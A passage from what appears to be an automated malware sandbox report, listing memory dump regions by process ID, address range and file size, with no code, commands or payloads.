                                                                                                                                                                                                                                                                                                • memory/2260-193-0x000000001BB60000-0x000000001BB62000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                • memory/2292-207-0x0000000000400000-0x00000000005D5000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.8MB

                                                                                                                                                                                                                                                                                                • memory/2292-204-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                                                • memory/2292-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/2296-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/2476-364-0x0000000000402F68-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/2548-288-0x000001DD252B0000-0x000001DD25321000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  452KB

                                                                                                                                                                                                                                                                                                • memory/2560-210-0x0000000000AD0000-0x0000000000B6D000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  628KB

                                                                                                                                                                                                                                                                                                • memory/2560-211-0x0000000000400000-0x0000000000636000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.2MB

                                                                                                                                                                                                                                                                                                • memory/2560-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/2568-299-0x0000019C1D340000-0x0000019C1D3B1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  452KB

                                                                                                                                                                                                                                                                                                • memory/2648-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/2664-328-0x0000025CEB100000-0x0000025CEB171000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  452KB

                                                                                                                                                                                                                                                                                                • memory/2688-319-0x0000026C17740000-0x0000026C177B1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  452KB

                                                                                                                                                                                                                                                                                                • memory/2816-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/2864-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/2880-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/2980-323-0x0000016C15480000-0x0000016C154F1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  452KB

                                                                                                                                                                                                                                                                                                • memory/3036-355-0x0000000000417E22-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3036-357-0x0000000004B60000-0x0000000005166000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                                                • memory/3052-321-0x0000000000610000-0x0000000000625000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  84KB

                                                                                                                                                                                                                                                                                                • memory/3308-242-0x0000000002790000-0x0000000002791000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3308-256-0x00000000027C0000-0x00000000027C1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3308-221-0x0000000002604000-0x0000000002606000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                • memory/3308-219-0x0000000002603000-0x0000000002604000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3308-205-0x00000000005F0000-0x000000000069E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  696KB

                                                                                                                                                                                                                                                                                                • memory/3308-217-0x0000000005150000-0x0000000005151000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3308-203-0x0000000002500000-0x000000000251B000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  108KB

                                                                                                                                                                                                                                                                                                • memory/3308-213-0x00000000025B0000-0x00000000025C9000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                • memory/3308-212-0x0000000004C50000-0x0000000004C51000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3308-289-0x0000000005770000-0x0000000005771000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3308-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3308-209-0x0000000002602000-0x0000000002603000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3308-208-0x0000000002600000-0x0000000002601000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3308-206-0x0000000000400000-0x00000000005EE000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.9MB

                                                                                                                                                                                                                                                                                                • memory/3388-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3456-248-0x0000000005220000-0x0000000005221000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3456-265-0x00000000011F0000-0x00000000011F1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3456-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3456-250-0x0000000001180000-0x00000000011B1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  196KB

                                                                                                                                                                                                                                                                                                • memory/3456-230-0x0000000002B70000-0x0000000002B71000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3456-220-0x0000000000840000-0x0000000000841000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3508-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3536-181-0x00000000000C0000-0x00000000000C1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/3536-192-0x000000001AC60000-0x000000001AC62000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                • memory/3536-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3548-361-0x0000000000417E8A-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3568-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3632-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3632-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3772-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3884-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3900-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3916-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3916-176-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  436KB

                                                                                                                                                                                                                                                                                                • memory/3920-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3956-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/3956-136-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  152KB

                                                                                                                                                                                                                                                                                                • memory/3956-150-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                • memory/3956-133-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  572KB

                                                                                                                                                                                                                                                                                                • memory/3956-137-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                • memory/3956-134-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                • memory/3956-135-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                • memory/3956-139-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  100KB

                                                                                                                                                                                                                                                                                                • memory/3956-138-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                                                                • memory/4116-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4116-249-0x0000000005430000-0x0000000005431000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4116-226-0x0000000000A70000-0x0000000000A71000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4116-233-0x0000000002B80000-0x0000000002B81000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4116-237-0x0000000002B90000-0x0000000002B9E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  56KB

                                                                                                                                                                                                                                                                                                • memory/4116-243-0x000000000A870000-0x000000000A871000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4144-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4164-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4164-339-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4192-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4192-231-0x00000000008F0000-0x00000000008F1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4192-246-0x0000000004FF0000-0x0000000005027000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  220KB

                                                                                                                                                                                                                                                                                                • memory/4192-327-0x0000000005360000-0x0000000005361000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4192-238-0x0000000001220000-0x0000000001221000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4192-252-0x0000000001230000-0x0000000001231000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4256-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4264-343-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4332-251-0x000000000491A000-0x0000000004A1B000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                                • memory/4332-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4332-254-0x0000000000F20000-0x0000000000F7D000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  372KB

                                                                                                                                                                                                                                                                                                • memory/4344-356-0x0000000004ED0000-0x0000000004ED1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4344-338-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4348-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4348-326-0x0000000000FA0000-0x0000000000FA2000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                • memory/4396-358-0x0000000004D50000-0x0000000005356000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                                                • memory/4396-353-0x0000000000417EAE-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4436-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4496-257-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4496-262-0x0000000000530000-0x0000000000531000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4496-333-0x0000000004D00000-0x0000000004D01000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4508-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4532-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4572-266-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4604-271-0x00007FF6560E4060-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4604-349-0x00000258D6120000-0x00000258D6226000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                                • memory/4604-348-0x00000258D3A70000-0x00000258D3A8B000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  108KB

                                                                                                                                                                                                                                                                                                • memory/4604-324-0x00000258D3980000-0x00000258D39F1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  452KB

                                                                                                                                                                                                                                                                                                • memory/4724-344-0x0000000005350000-0x0000000005351000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4724-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4756-298-0x0000000004B60000-0x000000000505E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  5.0MB

                                                                                                                                                                                                                                                                                                • memory/4756-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4756-287-0x0000000000320000-0x0000000000321000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4812-345-0x00000000046C0000-0x0000000004736000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                                                • memory/4812-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4896-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/4928-360-0x00000000777D0000-0x000000007795E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.6MB

                                                                                                                                                                                                                                                                                                • memory/4928-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/5068-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/5148-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                • memory/5164-369-0x0000000000000000-mapping.dmp